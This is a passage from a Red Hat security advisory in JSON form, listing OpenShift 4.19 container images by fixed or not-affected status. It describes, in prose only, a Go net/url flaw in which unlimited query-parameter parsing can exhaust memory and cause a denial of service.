"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:68a9cd133540eed3257ca2d5fa6f8ef384c3f66cc3cb4a30c72228c3450bce49_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:92a4f2142815522fdeee0f26ed1841cb16c10ab93ec38512f64ce82a81a12bb6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:e80c61f3f591b4a682b352c787e1715f7d9f4f06e209ef8dc82e41b8bded9b8e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:f5f04cf85a80bba86be83c2fdd946e2efe511959a0ff382620bb9f7aa25b8c71_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:920a0d0905c6decac8fa8ae599192003df5391c6672f6c6f5eec3b6d9a8e0fee_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:a247fbc173026dc90407f375b79904dc8d29daecacd96333fa6ef80b3186e8eb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:a97b0c4ab3e8716aadd8773aac0e95cb23aaaf6b618a2f759a1a53ecf078345f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:fc7191fca813048d552379742516176d723b1b1616dd53dd5ac557d117437c7a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:2848880f87cf2488a841e371c990a81b83e44e08e7e4b1599c2009f078080d85_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:5ec6c4b928751540b436763b99127acafab69b5dfc867cd4cf74871697327698_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:730d5918dbf2f364e8528b6c8036541fbbee9e81c1bd5f6985f87b4602bc4579_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:9fe8545ad96791b55050941f86c99eef5b8b88b927c0e1953ce3ee703b6bf525_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:233b4ee8499922834ec87e62c2d4f322062f8063c99a95010bcf817e6114af6e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:337f863c631718a87bb7c6f86491aab519c0885ab1fe4184dd33df493da56386_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:350c76802bc5210c06f8ee9ac9a4a7f2474505132c1eab2607bfab309f59e5f3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:43aa5f0fe9244c1aaf3912b184ffee644522a2ff3bd3aadd53db5b90b0c93c76_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:28f0a87cf08f7f9134bbe4ca64a7bc38a8882ecb5c8c6d57d5bb8f9096cdb76b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:4a986e828ec8120aa34ff2e35fe51c1866af855ea48e21d41aaeddcb4563a5d7_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:8fc1c4e8704ed03a5515293ed3b18f9cf2f72b57bf97f6f646f0c4b7dfd47d65_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:c8a812560939b0a79d1b687f36dd5c5b71d01bea059b07e3652b35678884d330_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:515b6d09bed60aa703612507005248bbda01c940605101e93897805a7f1e4666_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:b36db241db3e48fdc932865032dbedaf9d94816523648f4345f19acba26cd7f4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:e8b6d45610b94825d1f5525443529e99a5e68441a8f331e20746614a606dc475_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:f3405b744680f7e937609958ff100453abb5a7cff06344997be0b0a7b7fa29e3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:0df3b71023897418a185bfc7a38f4f67e0a41b6733452fefd59c9d7edbec3df6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:49afa7e1da94ce712c27df4a3e01d4748b2a493b4c61527a8a895c24e3001648_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:afbb2ca0948d8280647626e33064e6fc0d72310244cd69e338efdcc1b1ea7c8b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:e689a8391301d7ce3ba922d5fee8624e5d7f9c7a23905f78a7171d9a182d3f1c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:93ddc3e527257964b98d041a3d830c1be67f8c781f93d562c328c1dee7b37ef1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:97611bba51f02868cd922555e6c8e75d7eb4b5d8a865a69fd957084f897a5033_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:25f2667e3ce28ce5f0326be23f78cc6eedd523d4d2cdcfee2c02565d14d16ec2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:ec8e975cdae392efc948e02d0a30b98809739aff380a856ec97e0367fd1d0179_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:70ec66ac0b28bc34120378d962fdfe8a2f2411591611eaf6df7d4e62b8076a7f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:cc3b4055bc35dcc6c701bca3092202adbdbf5edefe3737167475ee2431fc30c1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:2b9e95c24afe6cdf775027984310e0388433100034ef17e8de50160370019063_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:47e0ce843654534a810ad00a3b0703d8abbf4b8f221c479bae47cceed4d944e1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:6c081df14b51b5bffaaf126426c8919de0821a460c3a7ec80abf95581b749609_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:7f52c583cdba43b214630766d8f050b322c936307f28e1951b47d2fdecd11acb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:470582fb21bf68d82be5cb2548bb4fd55827624330297d62b246a69b831153cd_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:a362b4e6bd7979c2413fe2bed3f66be4a44508bf397115caa539fa0857e26527_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:c0935ced156f72b3a6a77ff11445c038bd0555d881b73c760c7291cc7d27749b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:f434571500312f9a43f76fb244efb3184388fa6c34e955228612364918c8f1c8_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:5fa811100ce565454ba1e243b9d0b94ca6f9f630fe159d4a7de104eb844039e8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:a40105662b9188d283206418a2884182a9aff74c2cf4f700df3bd69443773d8c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:bde91bb377421a028e30bb830721f120be505c245717b5e2a3e25e5e6754bd5a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:e4ca2b3866c381b5fbbf8f6be7f9a34f4dd86ef1f952624e28760ce20ca3be64_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:07c0eed66aca1eed3b7897a24d97c00cb77f592f9b6900c7fb2644b4cfae6797_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:399d1be8fdde89d24d645044e04a0f5c0c105629896692c5e856a69d1bc6b076_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:62e2f95a2e6d53f00bfed8b866c40378bfb1219b72ba6b4e9478d4753fcfa623_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:7f8f9a3bce37f846d92e13388b17cff7e606c59abf74b88e8932cc4eb17f5828_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:395c76d76ca411005e4edc332331e1e36152ac788e1a54a02975ad3478a7f5de_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:53d9fba19f9ae47a65713eb4127c1f0c672a04cb55ec52861af3124dd2fe1e30_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:ceceb8b787ae6f1e9f00e32e4914456ae8dfe3f47c50efbf55ed0d1bb3f6c78a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:f99105f06107aae1f680d94d03d2f90607286c026aca50a877063235773368c7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6f39433829144540b1030be91fecb0b225ec0212fe0e63f4ff50c7d1e9461a38_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6fc27364a010efdbaeb7ede2c4aeaf867a8743d4fa9af5f9b6a16149f945de69_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:8ce1023bff832cada7cd5754986f8f2a7e24df72eee17707ff6df3acdab58465_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:e838bcfd2b1e7bb1376baff2a9e83cfb712b35be02767f62f10acc4edf5b4890_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4371bbcc4e87a108d9c6f2121c9120a5abcf32240f2c5b8fa4d9ff9023821d81_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4f7944def4efb736d1bb91507ce49497840db06495408913b57591fd2f72ed22_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:bb6e5818c800f72e4318c715666b51239050a3e7a7b6e7fdf96ec3b343a419af_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:cfd82e42cdba7e0724a9b0c5b90d42d526913ac96104e3ab6b449b59c3f5f3ad_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:355c8c7080214dbcd15bf77122550909eda1b1a5a1bcbc695ce80a495518b066_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:38a241d766a8321cfda212df868c63751fab60d99d8f05c671c07b39fc2dd2bf_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:4efb83eb7fca945c2f8bbb8c141c87bd4b7c4bd1ad09998e0e52259bcda88bd2_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:81ae7211c791e2b2e8f9ae37ba0c935e1b8dc8edef9c412058519e813518e6e7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:37a306bd6ec2676ed92426fc7e69cc2a3169013c31997f1144a1f22750309582_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:42985904fd805f7e3afeb21e514100045bc0fc77b7f7a8b81ce63c892d7eba70_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:6b6894e000302c61bc4eb20795f86491c14cddc1110e2534442b399d0e22ebdf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:a97fadbd51c77b4a854ecf0c403936adbf136dc83af3213fcc35fd6d5d67679e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:132bb73fc0ee5add8ea39eda9e4acfc0e3fab4ab85d2fb959e9a359dfe2b7b79_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:30c2d5c0f6ccd61860e95309dc27f8a1412cc6cf6173fef9a48461186f296336_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:6440ce5a0f8c34fea0b65fd43d8415c03d2c8c074f47efab4a2e47182a126c38_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:8c4b496454f9e8fe0bc85b5d4feb01c4c8ea0935d946b900ada2531d2c294ed3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:458198718ad90fe2caed08f8ae82b2ce996d62cc6455672db992e7f9bbacbcd3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:5e6e5206c98ab903f70b3e7402ac1d0c4342577038cb5810a268ba235502a717_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:60ec51c360f250cf70fdd2442b9def1ec17e2ded2cefe158995d701a0a7ec525_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:a116039d2376221a308ad495493553e704358e9cfc2fa4104785f7dd7242b90a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:05e68f45e8578ef2401473deda111a57de11143bb3cd63f84742cfc1bdbde1de_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:99d76e0fcc4bd0f276d574ea2edad252b552301aa10e2e4241e0e9462fdd03e7_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:d3fbf646c682c41b45e5ac529e3fa35abdb2610c2e746bfe19a7a12867165968_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:ff983c80717ff42cf4c6484fa4c38a1df4c88fd40d4e05fa3c47434d949d256b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-cloud-controller-manager-rhel9@sha256:fdf18e2f91a8d7dfed9ab25f41666e1f3ff3c2a49866a1ff557629602b9f4726_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-cluster-api-controllers-rhel9@sha256:75c7ccaeda39a8ede8e78244478c7fb3dd03c1523ef3dcda8982cc8cc74a7aee_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-syncer-rhel9@sha256:0d1f878c9d72ed2e0cf721f35015c55385df1eb3eb9bf966bb7d626f7826baf3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-problem-detector-rhel9@sha256:0925ab89d006b1b2665e701f3943ad2684e31ce86408919378014ecb7f7403ed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:0f1cb5f6dd220cb36e689dfa996022085bafe7a06aa6b8f3e4737ca281e143c4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:27a24944f1ef11eb36634a670dc865b5ff0a15d2e11905b82498916d8e9bf580_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:dcffbfba5a93e392e08fb0d010fd9b75694c4411016d09852fc51239d5234e9d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:fe3bfd4f788d5fe7258d04338de8ba9df4638db341674caed43859927f6ee3f9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:15d38afb007a612060445e5725ead06ed81130b761b11661e608a0debe464d24_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:4e69689cecf4ba62c9a3b7305e80c15ad5fcccbc85fb59a7e2969e14c7fb85f3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:a7a04880260ecec43abbfe7546f34ab6db488e82574cd7e9b0befa5399b601e8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:dbca06ba2c04ea72c1eb33a6c9d1c075016531eb9f72fc589fe759e55a57c408_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2434432"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the net/url package in the Go standard library. The package does not enforce a limit on the number of unique query parameters it parses. A Go application using the net/http.Request.ParseForm method will try to process all parameters provided in the request. A specially crafted HTTP request containing a massive number of query parameters will cause the application to consume an excessive amount of memory, eventually causing the application to crash or become unresponsive, resulting in a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang: net/url: Memory exhaustion in query parameter parsing in net/url",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "To exploit this flaw, an attacker must be able to send a specially crafted HTTP request to an application parsing URL-encoded forms with net/url, specifically a request containing a large number of unique query parameters. The request will cause the application to consume an excessive amount of memory and eventually result in a denial of service, with no impact to confidentiality or integrity. Due to this reason, this vulnerability has been rated with an important severity.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a31c0d7654d2495710df721e8e1aa57ae47f028966ca83aaa1b74a5b57f0a276_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a657295bab1d29d15cdd77ce366dd388153b5783c054067ef0ecd1c84e76db4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a95b88717fb16e809ea0b8654929e2808eb6fed3b84e45bbe3886e020d7acac4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:e5b07464aedee0bfb213c132174a22fc66e279eb8f7688078a07657237a8d334_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:3a47a587be70333ba3719bb416fb04c176e41ce27d2c051b1210717857fd9b92_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:d48293acc1ecfd8e08eed3f47d3c37eb9d5905642a04e12ed26434a222ed0476_ppc64le"
],
"known_not_affected": [
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:4273b3050117faf7bb14fd2bbcf71c5606b7b6f1326fcc1a36cf3ed51f6b3de0_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:5a2ecf041953f1ac77ef2ff25b6ccbb1c7b7741bcca8eab2bdeae706019f6c83_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:9874d99c0cb18c7120982f093f99fde589255ef5cfb1c67b6a6e95cf66f87a91_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:e5c889f9c92df65efd279220829dc129023a34fd6c4b4d93264739852581cd93_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:35cd98a46072b8c966553d8bb60bc4ed2f3c055eeaf3e7c4d080ec9605f6a96f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6a108c888888fc9a2fb0a3b834aab6eb2a6c0b691a39e3461725f87580062a91_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6d2feee745979668785a904900f8c9d5327477f83361f26eb5879e87e081bd25_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:c17c46279d5ad92b5ad7a58a1dc1bb8331b15ab424e7274818a1c47898b528e2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:055fea2fc51b9eb48327b78542f420a1d65dbcf786324f7bcbeda053d3fd35bc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:1d66a8807c27cd43c86399e67ec86906edb97be4ca38b4a752bef1c880848083_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:980e2f5e0f0676e559e91d50e2927fb9bf2f598db0d1ba043440e04d76cf46b9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:dcd241b04a6e196ad8b66a9d3cce0df26f126e99a85ce7a5443e61dc76194e5b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:093a5ff464b31d0f1058c452843dd119dfd1798d91855dbe9fdbd5a45c912efb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:2320a5d225dccf8f02379818bee2e93ae87a8444698f20141f6a0425b1661601_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:46adf0538ec9fbd67abc4565c013f2503c2a11191de264310a2c770bfb566753_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:d48ca3a08fbb356d69be5b61274d75b701d48803a9d57c8d377ce2d0df83169a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:0b1b706bc5a0188d40950a1fdd30f8c410e68dd568ed7d07c1f09443fbde28f4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:173800cfc487973c018e8d9badb7d60d26509bbe0803e9a56fba1d5a65070dc0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:78a2368225915aca2a514c5d82ba82fff8e70e6123c08905c46839a821f4c8ab_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:e44aa77638b86f0ade3d4b69e150e8e9e95573ec90b6031224b87e404b5d6a79_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:313b7b7e1f619f5fd121ca2402d9db6876d021be227b496288809f63f1209561_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:5b232dcf5a47400d1b1d105895df8143b50dc74613b1463b275d6d304e0e0085_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:774dcaecbaa4f7b743b49c34a6a9889a27c6379110672a2f28fb4f83cb0f0fe6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:8d55cc650683e44676413797328fff9b3563eb78a1aae4cabe736b20e9f15ff4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:13cd27f7e445af565cef18a24ceca435b4ce2a0c99876b9ad087fdf50e343be6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:5eee15ae4f809e708dbba035fdf60bd2c331462bc6256df74f9124fac03be62b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:af94257f6dd0307527211d5ab2b77ff971d5432a003d4f8e2f1e884cf6ee5215_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:cba1849a3d647457c561e01daf7eda74d775430a8b95458684620c0ebb3f47d2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:1b9bd17c112e00f11fca3cfaea5908d0cd370598beb6909a3c00f58ca6774bee_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:2c646a3a35e8a4503f378096f6045fdb816fa9d5728cc14759748b7265aa47dc_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:47fd82ed75709dd28b0f9f2eab2a051e3bedac64d2fa11dc93a8a8a7159e287b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:e95f8dd80a31504ccf2ff1ea37026370e41edd179151f1c7c2901e5ed12c1296_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:65c161d7215a460b2295a2b4eb82e8bd7e2079e145596185f83d84c4676f1eed_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:8f7e2a8735cb9b09639c5a467b8656bd7dd1bd4f72bc50164f0e4623ffacd93c_s390x",
